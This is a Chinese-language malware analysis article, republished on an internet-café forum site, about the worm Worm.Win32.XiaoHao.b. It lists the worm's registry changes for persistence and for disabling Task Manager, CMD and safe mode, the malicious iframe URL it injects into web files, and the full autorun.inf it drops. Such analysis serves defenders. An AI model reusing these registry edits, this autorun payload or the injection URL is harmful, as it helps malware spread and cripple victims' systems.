全面解读“小浩”病毒新变种“卡通耗子”

2008-3-6塞迪网佚名

【大中小】

“小浩”变种Worm.Win32.XiaoHao.b图标为卡通耗子形象，病毒扩展名为exe，主要通过网页木马、文件捆绑、移动存储介质方式传播。

病毒名称

Worm.Win32.XiaoHao.b

捕获时间

2008-04-29

病毒症状

该程序是使用VC编写的蠕虫程序，由微点主动防御软件自动捕获，程序未加壳，长度为19,456字节，图标为图标，病毒扩展名为exe，主要通过网页木马、文件捆绑、移动存储介质方式传播。

病毒分析

该蠕虫程序被执行后，创建名为“HACK”的互斥体，防止系统中有多个病毒进程存在；拷贝自身到目录％systemroot％\system32下，重命名为exloroe.com，修改文件属性为隐藏；将exloroe.com拷贝到目录C:\Documents and Settings\All Users\「开始」菜单\程序\启动下，重命名为word.com；

修改如下注册表键值实现修改.exe文件关联，当用户运行.exe文件时运行病毒本身、修改注册表自启动项以随系统一起启动、限制使用【Internet选项】命令、禁用CMD、禁用Windows自动更新、自动关闭停止相应程序、禁用任务管理器、禁用注册表编辑器、隐藏病毒文件；删除安全模式所对应的注册表键值，使用户不能通过安全模式修复系统；修改系统时间使部分杀毒软件不能正常使用；

枚举磁盘查找所有文件类型判断扩展名为htm、html、asp、aspx、php、jsp的文件时，在文件内插入

<iframe ></iframe>

解密后为http://www.158dm.cn/a1.htm；查找杀毒软件主程序文件

avp.exe、kavscr.exe、Rav.exe、Navapw32.exe、Iparmor.exe、KV*.exe

试图进行感染；之后访问网站，解密后为http://www.***dm.cn/bd.htm；遍历盘符在各分区和移动存储介质中释放病毒文件Xiaohao.com和autorun.inf,使用Windows自动播放功能来传播病毒。

病毒修改的注册表项：

项:HKCR\exefile\shell\open\command\
健值:默认
指向数据:病毒原程序当前所在路径 "%1" %*"

项：HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
健值：exloroe
指向数据：％systemroot％\system32\exloroe.com

项：HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\
健值：NoBrowserOptions
指向数据：01

项：HKCU\Software\Policies\Microsoft\Windows\System\
健值：DisableCMD
指向数据：02

项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
健值：NoCommon Groups
指向数据：01

项：HKCU\Control Panel\Desktop\
健值：AutoEndTasks
指向数据：01

项：HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
健值：CheckedValue
指向数据：01

项：HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\
健值：NoFolderOptions
指向数据：01

项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
健值：DisableTaskMgr
指向数据：01

项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
健值：DisableRegistryTools
指向数据：01

项：HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
健值：ShowSuperHidden
指向数据：00

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

autorun.inf文件内容如下：

[Autorun]
open=Xiaohao.com
shell\open=打开(&O)
shell\open\Command=Xiaohao.com
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=Xiaohao.com
shellexecute=Xiaohao.com
shell\Auto\command=Xiaohao.com

感染对象

Windows 2000/Windows XP/Windows 2003

传播途径

网页木马、文件捆绑、移动存储介质

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理，安装维护:

本文来源：塞迪网作者：佚名

上一篇文章：小浩新变种来袭变身卡通耗子再度登场

下一篇文章：线上游戏窃取者关闭系统声音逃避杀软追杀

品质315！三个维度解读西伯利亚专业电竞游戏耳机   解读机械键盘防水猫腻 IP68国际认证才是真防水   四方面详细解读网游实名制
从法律角度看网吧案件：网吧内遭6人围殴4小时后身亡   ETCP谭龙在首届中国城市停车大会承诺全面开放停车场资源   戴尔新款XPS 15全面评测：外形美性能强、体验出色值得买
一份详细又全面的开网咖流程方案   360发布儿童成长状况大数据全方位解读孩子成长点滴   《新闻大求真》解读春运抢票 360专家揭示抢票关键
华硕ZenBook 3全面评测：外形美性能强、足以媲美MacBook

聚合推荐 ┊ 更多专题..

2022年网吧恢复营业时间网吧卫生网吧电脑配置开网吧网吧键盘网吧配置网吧GHOST ROS 网吧软件故障解决网众无盘网吧游戏菜单网吧活动网吧优化网吧精品网吧新手

声明

本文来源地址：0
声明：本站所发表的文章、评论及图片仅代表作者本人观点，与本站立场无关。若文章侵犯了您的相关权益，请及时与我们联系，我们会及时处理，感谢您对本站的支持！联系Email：support@txwb.com.，本站所有有注明来源为天下网吧或天下网吧论坛的原创作品，各位转载时请注明来源链接！

天下网吧·网吧天下

全面解读“小浩”病毒新变种“卡通耗子”

推荐文章

最新文章